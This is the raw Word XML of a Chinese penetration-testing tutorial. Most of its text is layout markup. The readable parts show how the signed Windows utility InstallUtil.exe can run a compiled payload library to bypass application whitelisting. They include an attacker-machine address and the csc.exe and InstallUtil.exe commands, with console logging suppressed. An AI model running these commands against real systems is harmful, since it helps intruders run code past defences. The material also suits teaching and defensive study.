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70.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,7417" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:7417;width:82;height:322" coordorigin="1177,7417" coordsize="82,322" path="m1217,7423l1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7423,1217,7424,1217,7424,1217,7424,1217,7424,1217,7424,1217,7425,1217,7425,1217,7425,1217,7426,1217,7426,1217,7426,1217,7427,1217,7427,1217,7428,1217,7428,1217,7429,1217,7429,1217,7430,1217,7430,1217,7431,1217,7432,1217,7433,1217,7433,1217,7434,1217,7435,1217,7436,1217,7437,1217,7438,1217,7439,1217,7440,1217,7441,1217,7442,1217,7444,1217,7445,1217,7446,1217,7448,1217,7449,1217,7451,1217,7452,1217,7454,1217,7456,1217,7457,1217,7459,1217,7461,1217,7463,1217,7465,1217,7467,1217,7469,1217,7472,1217,7474,1217,7476,1217,7479,1217,7481,1217,7484,1217,7486,1217,7489,1217,7492,1217,7495,1217,7498,1217,7501,1217,7504,1217,7507,1217,7511,1217,7514,1217,7517,1217,7521,1217,7525,1217,7528,1217,7532,1217,7536,1217,7540,1217,7544,1217,7548,1217,7553,1217,7557,1217,7561,1217,7566,1217,7571,1217,7575,1217,7580,1217,7585,1217,7590,1217,7596,1217,7601,1217,7606,1217,7612,1217,7617,1217,7623,1217,7629,1217,7635,1217,7641,1217,7647,1217,7653,1217,7660,1217,7666,1217,7673,1217,7680,1217,7687,1217,7694,1217,7701,1217,7708,1217,7715,1217,7723e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:510.600pt;width:467.400pt;height:265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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Installutil简</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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Inst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aller工具是一个命令行实用程序，允许您通过执行指定程序集中的安装程序组件来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603" w:right="1118" w:firstLine="-483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安装和卸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载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用。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具体参考：Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-4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Installer部署</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://docs.microsoft.com/zh-cn/p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revious-versions/2kt85ked(v=vs.120)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63" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-11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Installutil.exe所在路径没有被系统添加PATH环境变量中，因此，Inst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allutil命令无法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识别。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基于白名单installuti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l.exe配置payload：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75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C:\Windows\Microsoft.NET\Framework\v4.0.30319\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InstallUtil.exe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攻击机：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192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="57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Debian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7131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154.500pt;width:449.500pt;height:60.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3090" coordsize="8990,1210">
        <v:shape style="position:absolute;left:1490;top:3090;width:8990;height:1210" coordorigin="1490,3090" coordsize="8990,1210" path="m1510,3101l1510,3101,1510,3101,1510,3101,1510,3101,1510,3101,1510,3101,1511,3101,1512,3101,1512,3101,1514,3101,1515,3101,1517,3101,1519,3101,1521,3101,1524,3101,1528,3101,1532,3101,1536,3101,1541,3101,1546,3101,1552,3101,1559,3101,1566,3101,1575,3101,1583,3101,1593,3101,1603,3101,1615,3101,1627,3101,1640,3101,1654,3101,1668,3101,1684,3101,1701,3101,1719,3101,1738,3101,1758,3101,1780,3101,1802,3101,1826,3101,1851,3101,1877,3101,1904,3101,1933,3101,1963,3101,1995,3101,2028,3101,2063,3101,2099,3101,2136,3101,2175,3101,2216,3101,2259,3101,2303,3101,2348,3101,2396,3101,2445,3101,2496,3101,2549,3101,2604,3101,2660,3101,2719,3101,2779,3101,2841,3101,2906,3101,2972,3101,3041,3101,3112,3101,3184,3101,3259,3101,3336,3101,3416,3101,3498,3101,3582,3101,3668,3101,3757,3101,3848,3101,3941,3101,4037,3101,4136,3101,4236,3101,4340,3101,4446,3101,4555,3101,4666,3101,4780,3101,4897,3101,5017,3101,5139,3101,5264,3101,5392,3101,5523,3101,5657,3101,5793,3101,5933,3101,6076,3101,6222,3101,6370,3101,6522,3101,6677,3101,6835,3101,6997,3101,7161,3101,7329,3101,7500,3101,7675,3101,7853,3101,8034,3101,8219,3101,8407,3101,8598,3101,8793,3101,8992,3101,9194,3101,9400,3101,9609,3101,9823,3101,10039,3101,10260,3101,10484,3101,10484,3101,10484,3101,10484,3101,10484,3101,10484,3101,10484,3101,10484,3101,10484,3101,10484,3101,10484,3101,10484,3101,10484,3102,10484,3102,10484,3102,10484,3103,10484,3103,10484,3104,10484,3104,10484,3105,10484,3106,10484,3106,10484,3107,10484,3108,10484,3109,10484,3111,10484,3112,10484,3113,10484,3115,10484,3116,10484,3118,10484,3120,10484,3122,10484,3124,10484,3126,10484,3129,10484,3131,10484,3134,10484,3137,10484,3140,10484,3143,10484,3147,10484,3150,10484,3154,10484,3158,10484,3162,10484,3166,10484,3171,10484,3175,10484,3180,10484,3185,10484,3191,10484,3196,10484,3202,10484,3208,10484,3214,10484,3221,10484,3227,10484,3234,10484,3241,10484,3249,10484,3256,10484,3264,10484,3272,10484,3281,10484,3290,10484,3299,10484,3308,10484,3318,10484,3327,10484,3338,10484,3348,10484,3359,10484,3370,10484,3381,10484,3393,10484,3405,10484,3417,10484,3430,10484,3443,10484,3456,10484,3470,10484,3484,10484,3498,10484,3513,10484,3528,10484,3544,10484,3559,10484,3576,10484,3592,10484,3609,10484,3626,10484,3644,10484,3662,10484,3681,10484,3700,10484,3719,10484,3739,10484,3759,10484,3780,10484,3800,10484,3822,10484,3844,10484,3866,10484,3889,10484,3912,10484,3936,10484,3960,10484,3984,10484,4009,10484,4035,10484,4061,10484,4087,10484,4114,10484,4141,10484,4169,10484,4198,10484,4227,10484,4256,10484,4286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5,1510,4315,1510,4315,1510,4315,1510,4314,1510,4314,1510,4313,1510,4313,1510,4312,1510,4311,1510,4310,1510,4309,1510,4308,1510,4307,1510,4306,1510,4305,1510,4303,1510,4302,1510,4300,1510,4299,1510,4297,1510,4295,1510,4293,1510,4290,1510,4288,1510,4285,1510,4283,1510,4280,1510,4277,1510,4273,1510,4270,1510,4266,1510,4263,1510,4259,1510,4255,1510,4250,1510,4246,1510,4241,1510,4236,1510,4231,1510,4226,1510,4220,1510,4215,1510,4209,1510,4203,1510,4196,1510,4189,1510,4183,1510,4175,1510,4168,1510,4160,1510,4152,1510,4144,1510,4136,1510,4127,1510,4118,1510,4109,1510,4099,1510,4089,1510,4079,1510,4069,1510,4058,1510,4047,1510,4036,1510,4024,1510,4012,1510,4000,1510,3987,1510,3974,1510,3961,1510,3947,1510,3933,1510,3918,1510,3904,1510,3889,1510,3873,1510,3857,1510,3841,1510,3825,1510,3808,1510,3790,1510,3773,1510,3754,1510,3736,1510,3717,1510,3698,1510,3678,1510,3658,1510,3637,1510,3616,1510,3595,1510,3573,1510,3551,1510,3528,1510,3505,1510,3481,1510,3457,1510,3432,1510,3407,1510,3382,1510,3356,1510,3330,1510,3303,1510,3275,1510,3247,1510,3219,1510,3190,1510,3161,1510,3131,1510,3101e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:153.600pt;width:445.800pt;height:62.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:519.500pt;margin-top:596.500pt;width:0.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,11930" coordsize="10,670">
        <v:shape style="position:absolute;left:10390;top:11930;width:10;height:670" coordorigin="10390,11930" coordsize="10,670" path="m10402,11940l10402,11940,10402,11940,10402,11940,10402,11940,10402,11940,10402,11940,10402,11940,10402,11940,10402,11940,10402,11940,10402,11940,10402,11941,10402,11941,10402,11941,10402,11941,10402,11941,10402,11942,10402,11942,10402,11942,10402,11943,10402,11943,10402,11944,10402,11944,10402,11945,10402,11945,10402,11946,10402,11947,10402,11948,10402,11949,10402,11950,10402,11951,10402,11952,10402,11953,10402,11954,10402,11955,10402,11957,10402,11958,10402,11960,10402,11962,10402,11963,10402,11965,10402,11967,10402,11969,10402,11971,10402,11973,10402,11976,10402,11978,10402,11981,10402,11983,10402,11986,10402,11989,10402,11992,10402,11995,10402,11998,10402,12002,10402,12005,10402,12009,10402,12013,10402,12016,10402,12020,10402,12025,10402,12029,10402,12033,10402,12038,10402,12043,10402,12048,10402,12053,10402,12058,10402,12063,10402,12069,10402,12074,10402,12080,10402,12086,10402,12092,10402,12099,10402,12105,10402,12112,10402,12119,10402,12126,10402,12133,10402,12141,10402,12148,10402,12156,10402,12164,10402,12172,10402,12181,10402,12189,10402,12198,10402,12207,10402,12216,10402,12226,10402,12235,10402,12245,10402,12255,10402,12265,10402,12276,10402,12287,10402,12298,10402,12309,10402,12320,10402,12332,10402,12344,10402,12356,10402,12368,10402,12381,10402,12394,10402,12407,10402,12420,10402,12434,10402,12447,10402,12462,10402,12476,10402,12491,10402,12505,10402,12521,10402,12536,10402,12552,10402,12568,10402,12584,10402,12600e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:596.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11930" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:11930;width:8990;height:670" coordorigin="1490,11930" coordsize="8990,670" path="m1510,11940l1510,11940,1510,11940,1510,11940,1510,11940,1510,11940,1510,11940,1511,11940,1512,11940,1512,11940,1514,11940,1515,11940,1517,11940,1519,11940,1521,11940,1524,11940,1528,11940,1532,11940,1536,11940,1541,11940,1546,11940,1552,11940,1559,11940,1566,11940,1575,11940,1583,11940,1593,11940,1603,11940,1615,11940,1627,11940,1640,11940,1654,11940,1668,11940,1684,11940,1701,11940,1719,11940,1738,11940,1758,11940,1780,11940,1802,11940,1826,11940,1851,11940,1877,11940,1904,11940,1933,11940,1963,11940,1995,11940,2028,11940,2063,11940,2099,11940,2136,11940,2175,11940,2216,11940,2259,11940,2303,11940,2348,11940,2396,11940,2445,11940,2496,11940,2549,11940,2604,11940,2660,11940,2719,11940,2779,11940,2841,11940,2906,11940,2972,11940,3041,11940,3112,11940,3184,11940,3259,11940,3336,11940,3416,11940,3498,11940,3582,11940,3668,11940,3757,11940,3848,11940,3941,11940,4037,11940,4136,11940,4236,11940,4340,11940,4446,11940,4555,11940,4666,11940,4780,11940,4897,11940,5017,11940,5139,11940,5264,11940,5392,11940,5523,11940,5657,11940,5793,11940,5933,11940,6076,11940,6222,11940,6370,11940,6522,11940,6677,11940,6835,11940,6997,11940,7161,11940,7329,11940,7500,11940,7675,11940,7853,11940,8034,11940,8219,11940,8407,11940,8598,11940,8793,11940,8992,11940,9194,11940,9400,11940,9609,11940,9823,11940,10039,11940,10260,11940,10484,11940,10484,11940,10484,11940,10484,11940,10484,11940,10484,11940,10484,11940,10484,11940,10484,11940,10484,11940,10484,11940,10484,11940,10484,11941,10484,11941,10484,11941,10484,11941,10484,11941,10484,11942,10484,11942,10484,11942,10484,11943,10484,11943,10484,11944,10484,11944,10484,11945,10484,11945,10484,11946,10484,11947,10484,11948,10484,11949,10484,11950,10484,11951,10484,11952,10484,11953,10484,11954,10484,11955,10484,11957,10484,11958,10484,11960,10484,11962,10484,11963,10484,11965,10484,11967,10484,11969,10484,11971,10484,11973,10484,11976,10484,11978,10484,11981,10484,11983,10484,11986,10484,11989,10484,11992,10484,11995,10484,11998,10484,12002,10484,12005,10484,12009,10484,12013,10484,12016,10484,12020,10484,12025,10484,12029,10484,12033,10484,12038,10484,12043,10484,12048,10484,12053,10484,12058,10484,12063,10484,12069,10484,12074,10484,12080,10484,12086,10484,12092,10484,12099,10484,12105,10484,12112,10484,12119,10484,12126,10484,12133,10484,12141,10484,12148,10484,12156,10484,12164,10484,12172,10484,12181,10484,12189,10484,12198,10484,12207,10484,12216,10484,12226,10484,12235,10484,12245,10484,12255,10484,12265,10484,12276,10484,12287,10484,12298,10484,12309,10484,12320,10484,12332,10484,12344,10484,12356,10484,12368,10484,12381,10484,12394,10484,12407,10484,12420,10484,12434,10484,12447,10484,12462,10484,12476,10484,12491,10484,12505,10484,12521,10484,12536,10484,12552,10484,12568,10484,12584,10484,12600,10484,12600,10484,12600,10484,12600,10484,12600,10484,12600,10484,12600,10483,12600,10482,12600,10482,12600,10480,12600,10479,12600,10477,12600,10475,12600,10473,12600,10470,12600,10466,12600,10462,12600,10458,12600,10453,12600,10448,12600,10442,12600,10435,12600,10428,12600,10419,12600,10411,12600,10401,12600,10391,12600,10379,12600,10367,12600,10354,12600,10340,12600,10326,12600,10310,12600,10293,12600,10275,12600,10256,12600,10236,12600,10215,12600,10192,12600,10168,12600,10143,12600,10117,12600,10090,12600,10061,12600,10031,12600,9999,12600,9966,12600,9931,12600,9895,12600,9858,12600,9819,12600,9778,12600,9735,12600,9691,12600,9646,12600,9598,12600,9549,12600,9498,12600,9445,12600,9391,12600,9334,12600,9275,12600,9215,12600,9153,12600,9088,12600,9022,12600,8953,12600,8883,12600,8810,12600,8735,12600,8658,12600,8578,12600,8497,12600,8413,12600,8326,12600,8238,12600,8146,12600,8053,12600,7957,12600,7859,12600,7758,12600,7654,12600,7548,12600,7439,12600,7328,12600,7214,12600,7097,12600,6977,12600,6855,12600,6730,12600,6602,12600,6471,12600,6337,12600,6201,12600,6061,12600,5918,12600,5773,12600,5624,12600,5472,12600,5317,12600,5159,12600,4997,12600,4833,12600,4665,12600,4494,12600,4319,12600,4141,12600,3960,12600,3776,12600,3587,12600,3396,12600,3201,12600,3002,12600,2800,12600,2594,12600,2385,12600,2172,12600,1955,12600,1734,12600,1510,12600,1510,12600,1510,12600,1510,12600,1510,12600,1510,12600,1510,12600,1510,12600,1510,12600,1510,12600,1510,12600,1510,12600,1510,12600,1510,12600,1510,12599,1510,12599,1510,12599,1510,12599,1510,12598,1510,12598,1510,12598,1510,12597,1510,12597,1510,12596,1510,12596,1510,12595,1510,12594,1510,12593,1510,12593,1510,12592,1510,12591,1510,12590,1510,12589,1510,12588,1510,12586,1510,12585,1510,12584,1510,12582,1510,12580,1510,12579,1510,12577,1510,12575,1510,12573,1510,12571,1510,12569,1510,12567,1510,12565,1510,12562,1510,12560,1510,12557,1510,12554,1510,12551,1510,12548,1510,12545,1510,12542,1510,12539,1510,12535,1510,12532,1510,12528,1510,12524,1510,12520,1510,12516,1510,12511,1510,12507,1510,12502,1510,12498,1510,12493,1510,12488,1510,12482,1510,12477,1510,12472,1510,12466,1510,12460,1510,12454,1510,12448,1510,12442,1510,12435,1510,12428,1510,12421,1510,12414,1510,12407,1510,12400,1510,12392,1510,12384,1510,12376,1510,12368,1510,12360,1510,12351,1510,12342,1510,12333,1510,12324,1510,12315,1510,12305,1510,12295,1510,12285,1510,12275,1510,12264,1510,12254,1510,12243,1510,12232,1510,12220,1510,12208,1510,12197,1510,12185,1510,12172,1510,12160,1510,12147,1510,12134,1510,12120,1510,12107,1510,12093,1510,12079,1510,12064,1510,12050,1510,12035,1510,12020,1510,12004,1510,11989,1510,11973,1510,11957,1510,11940e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:596.400pt;width:445.800pt;height:33.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:235.800pt;width:467.400pt;height:149.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:424.800pt;width:136.800pt;height:110.4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de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机编译：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C:\Windows\Microsoft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NET\Framework64\v4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0.30319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\csc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r:System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rpriseServices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r:System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IO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Compression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target:library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out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:Mic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opoor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keyfile:C:\Users\John\Desktop\installutil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snk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unsafe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C:\Users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\John\Desktop\installutil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payload：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Micro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poor.exe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de3f29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C:\Windows\Microsoft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NET\Framework64\v4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0.30319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\InstallUtil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logfi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LogToConsole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false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Micropoor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454.453pt;width:0.0pt;height:387.546pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,9089" coordsize="0,7750">
        <v:shape style="position:absolute;left:10402;top:9089;width:0;height:7750" coordorigin="10402,9089" coordsize="0,7750" path="m10402,9089l10402,9089,10402,9089,10402,9089,10402,9089,10402,9089,10402,9089,10402,9090,10402,9090,10402,9091,10402,9092,10402,9093,10402,9095,10402,9097,10402,9099,10402,9101,10402,9104,10402,9107,10402,9111,10402,9115,10402,9120,10402,9125,10402,9131,10402,9138,10402,9145,10402,9152,10402,9160,10402,9169,10402,9179,10402,9190,10402,9201,10402,9213,10402,9226,10402,9239,10402,9254,10402,9269,10402,9286,10402,9303,10402,9322,10402,9341,10402,9361,10402,9383,10402,9406,10402,9429,10402,9454,10402,9480,10402,9508,10402,9536,10402,9566,10402,9597,10402,9630,10402,9664,10402,9699,10402,9735,10402,9773,10402,9813,10402,9854,10402,9896,10402,9940,10402,9986,10402,10033,10402,10082,10402,10133,10402,10185,10402,10239,10402,10294,10402,10352,10402,10411,10402,10472,10402,10535,10402,10600,10402,10666,10402,10735,10402,10805,10402,10878,10402,10952,10402,11029,10402,11108,10402,11188,10402,11271,10402,11356,10402,11444,10402,11533,10402,11625,10402,11719,10402,11815,10402,11913,10402,12014,10402,12117,10402,12223,10402,12331,10402,12442,10402,12555,10402,12670,10402,12788,10402,12909,10402,13032,10402,13158,10402,13286,10402,13418,10402,13551,10402,13688,10402,13827,10402,13970,10402,14115,10402,14262,10402,14413,10402,14567,10402,14723,10402,14883,10402,15045,10402,15211,10402,15379,10402,15551,10402,15725,10402,15903,10402,16084,10402,16268,10402,16455,10402,16646,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:453.500pt;width:449.500pt;height:46.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9070" coordsize="8990,930">
        <v:shape style="position:absolute;left:1490;top:9070;width:8990;height:930" coordorigin="1490,9070" coordsize="8990,930" path="m1510,9089l1510,9089,1510,9089,1510,9089,1510,9089,1510,9089,1510,9089,1511,9089,1512,9089,1512,9089,1514,9089,1515,9089,1517,9089,1519,9089,1521,9089,1524,9089,1528,9089,1532,9089,1536,9089,1541,9089,1546,9089,1552,9089,1559,9089,1566,9089,1575,9089,1583,9089,1593,9089,1603,9089,1615,9089,1627,9089,1640,9089,1654,9089,1668,9089,1684,9089,1701,9089,1719,9089,1738,9089,1758,9089,1780,9089,1802,9089,1826,9089,1851,9089,1877,9089,1904,9089,1933,9089,1963,9089,1995,9089,2028,9089,2063,9089,2099,9089,2136,9089,2175,9089,2216,9089,2259,9089,2303,9089,2348,9089,2396,9089,2445,9089,2496,9089,2549,9089,2604,9089,2660,9089,2719,9089,2779,9089,2841,9089,2906,9089,2972,9089,3041,9089,3112,9089,3184,9089,3259,9089,3336,9089,3416,9089,3498,9089,3582,9089,3668,9089,3757,9089,3848,9089,3941,9089,4037,9089,4136,9089,4236,9089,4340,9089,4446,9089,4555,9089,4666,9089,4780,9089,4897,9089,5017,9089,5139,9089,5264,9089,5392,9089,5523,9089,5657,9089,5793,9089,5933,9089,6076,9089,6222,9089,6370,9089,6522,9089,6677,9089,6835,9089,6997,9089,7161,9089,7329,9089,7500,9089,7675,9089,7853,9089,8034,9089,8219,9089,8407,9089,8598,9089,8793,9089,8992,9089,9194,9089,9400,9089,9609,9089,9823,9089,10039,9089,10260,9089,10484,9089,10484,9089,10484,9089,10484,9089,10484,9089,10484,9089,10484,9089,10484,9089,10484,9089,10484,9089,10484,9089,10484,9089,10484,9089,10484,9090,10484,9090,10484,9090,10484,9090,10484,9091,10484,9091,10484,9092,10484,9092,10484,9093,10484,9094,10484,9094,10484,9095,10484,9096,10484,9097,10484,9098,10484,9099,10484,9101,10484,9102,10484,9103,10484,9105,10484,9107,10484,9108,10484,9110,10484,9112,10484,9114,10484,9117,10484,9119,10484,9121,10484,9124,10484,9127,10484,9129,10484,9132,10484,9136,10484,9139,10484,9142,10484,9146,10484,9150,10484,9154,10484,9158,10484,9162,10484,9166,10484,9171,10484,9176,10484,9180,10484,9186,10484,9191,10484,9196,10484,9202,10484,9208,10484,9214,10484,9220,10484,9227,10484,9233,10484,9240,10484,9247,10484,9255,10484,9262,10484,9270,10484,9278,10484,9286,10484,9295,10484,9303,10484,9312,10484,9322,10484,9331,10484,9341,10484,9351,10484,9361,10484,9371,10484,9382,10484,9393,10484,9404,10484,9416,10484,9428,10484,9440,10484,9452,10484,9465,10484,9478,10484,9491,10484,9505,10484,9519,10484,9533,10484,9547,10484,9562,10484,9577,10484,9593,10484,9608,10484,9624,10484,9641,10484,9657,10484,9675,10484,9692,10484,9710,10484,9728,10484,9746,10484,9765,10484,9784,10484,9804,10484,9823,10484,9844,10484,9864,10484,9885,10484,9907,10484,9928,10484,9950,10484,9973,10484,9996,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10483,10019,10482,10019,10482,10019,10480,10019,10479,10019,10477,10019,10475,10019,10473,10019,10470,10019,10466,10019,10462,10019,10458,10019,10453,10019,10448,10019,10442,10019,10435,10019,10428,10019,10419,10019,10411,10019,10401,10019,10391,10019,10379,10019,10367,10019,10354,10019,10340,10019,10326,10019,10310,10019,10293,10019,10275,10019,10256,10019,10236,10019,10215,10019,10192,10019,10168,10019,10143,10019,10117,10019,10090,10019,10061,10019,10031,10019,9999,10019,9966,10019,9931,10019,9895,10019,9858,10019,9819,10019,9778,10019,9735,10019,9691,10019,9646,10019,9598,10019,9549,10019,9498,10019,9445,10019,9391,10019,9334,10019,9275,10019,9215,10019,9153,10019,9088,10019,9022,10019,8953,10019,8883,10019,8810,10019,8735,10019,8658,10019,8578,10019,8497,10019,8413,10019,8326,10019,8238,10019,8146,10019,8053,10019,7957,10019,7859,10019,7758,10019,7654,10019,7548,10019,7439,10019,7328,10019,7214,10019,7097,10019,6977,10019,6855,10019,6730,10019,6602,10019,6471,10019,6337,10019,6201,10019,6061,10019,5918,10019,5773,10019,5624,10019,5472,10019,5317,10019,5159,10019,4997,10019,4833,10019,4665,10019,4494,10019,4319,10019,4141,10019,3960,10019,3776,10019,3587,10019,3396,10019,3201,10019,3002,10019,2800,10019,2594,10019,2385,10019,2172,10019,1955,10019,1734,10019,1510,10019,1510,10019,1510,10019,1510,10019,1510,10019,1510,10019,1510,10019,1510,10019,1510,10019,1510,10019,1510,10019,1510,10018,1510,10018,1510,10018,1510,10018,1510,10018,1510,10017,1510,10017,1510,10016,1510,10016,1510,10015,1510,10015,1510,10014,1510,10013,1510,10012,1510,10011,1510,10010,1510,10009,1510,10008,1510,10007,1510,10006,1510,10004,1510,10003,1510,10001,1510,9999,1510,9997,1510,9995,1510,9993,1510,9991,1510,9989,1510,9986,1510,9984,1510,9981,1510,9978,1510,9975,1510,9972,1510,9969,1510,9965,1510,9962,1510,9958,1510,9954,1510,9950,1510,9946,1510,9941,1510,9937,1510,9932,1510,9927,1510,9922,1510,9917,1510,9911,1510,9906,1510,9900,1510,9894,1510,9887,1510,9881,1510,9874,1510,9867,1510,9860,1510,9853,1510,9845,1510,9838,1510,9830,1510,9821,1510,9813,1510,9804,1510,9795,1510,9786,1510,9777,1510,9767,1510,9757,1510,9747,1510,9736,1510,9726,1510,9715,1510,9703,1510,9692,1510,9680,1510,9668,1510,9655,1510,9643,1510,9630,1510,9617,1510,9603,1510,9589,1510,9575,1510,9560,1510,9546,1510,9531,1510,9515,1510,9499,1510,9483,1510,9467,1510,9450,1510,9433,1510,9416,1510,9398,1510,9380,1510,9361,1510,9343,1510,9323,1510,9304,1510,9284,1510,9264,1510,9243,1510,9222,1510,9201,1510,9179,1510,9157,1510,9135,1510,9112,1510,9089e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:453.600pt;width:445.800pt;height:47.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId12" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:499.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9990" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:9990;width:8990;height:370" coordorigin="1490,9990" coordsize="8990,370" path="m1510,10019l1510,10019,1510,10019,1510,10019,1510,10019,1510,10019,1510,10019,1511,10019,1512,10019,1512,10019,1514,10019,1515,10019,1517,10019,1519,10019,1521,10019,1524,10019,1528,10019,1532,10019,1536,10019,1541,10019,1546,10019,1552,10019,1559,10019,1566,10019,1575,10019,1583,10019,1593,10019,1603,10019,1615,10019,1627,10019,1640,10019,1654,10019,1668,10019,1684,10019,1701,10019,1719,10019,1738,10019,1758,10019,1780,10019,1802,10019,1826,10019,1851,10019,1877,10019,1904,10019,1933,10019,1963,10019,1995,10019,2028,10019,2063,10019,2099,10019,2136,10019,2175,10019,2216,10019,2259,10019,2303,10019,2348,10019,2396,10019,2445,10019,2496,10019,2549,10019,2604,10019,2660,10019,2719,10019,2779,10019,2841,10019,2906,10019,2972,10019,3041,10019,3112,10019,3184,10019,3259,10019,3336,10019,3416,10019,3498,10019,3582,10019,3668,10019,3757,10019,3848,10019,3941,10019,4037,10019,4136,10019,4236,10019,4340,10019,4446,10019,4555,10019,4666,10019,4780,10019,4897,10019,5017,10019,5139,10019,5264,10019,5392,10019,5523,10019,5657,10019,5793,10019,5933,10019,6076,10019,6222,10019,6370,10019,6522,10019,6677,10019,6835,10019,6997,10019,7161,10019,7329,10019,7500,10019,7675,10019,7853,10019,8034,10019,8219,10019,8407,10019,8598,10019,8793,10019,8992,10019,9194,10019,9400,10019,9609,10019,9823,10019,10039,10019,10260,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10019,10484,10020,10484,10020,10484,10020,10484,10020,10484,10020,10484,10020,10484,10021,10484,10021,10484,10021,10484,10021,10484,10022,10484,10022,10484,10022,10484,10023,10484,10023,10484,10024,10484,10024,10484,10025,10484,10025,10484,10026,10484,10027,10484,10027,10484,10028,10484,10029,10484,10030,10484,10031,10484,10032,10484,10033,10484,10034,10484,10035,10484,10036,10484,10037,10484,10039,10484,10040,10484,10041,10484,10043,10484,10044,10484,10046,10484,10047,10484,10049,10484,10051,10484,10053,10484,10055,10484,10057,10484,10059,10484,10061,10484,10063,10484,10065,10484,10068,10484,10070,10484,10072,10484,10075,10484,10078,10484,10080,10484,10083,10484,10086,10484,10089,10484,10092,10484,10096,10484,10099,10484,10102,10484,10106,10484,10109,10484,10113,10484,10117,10484,10120,10484,10124,10484,10128,10484,10133,10484,10137,10484,10141,10484,10146,10484,10150,10484,10155,10484,10160,10484,10165,10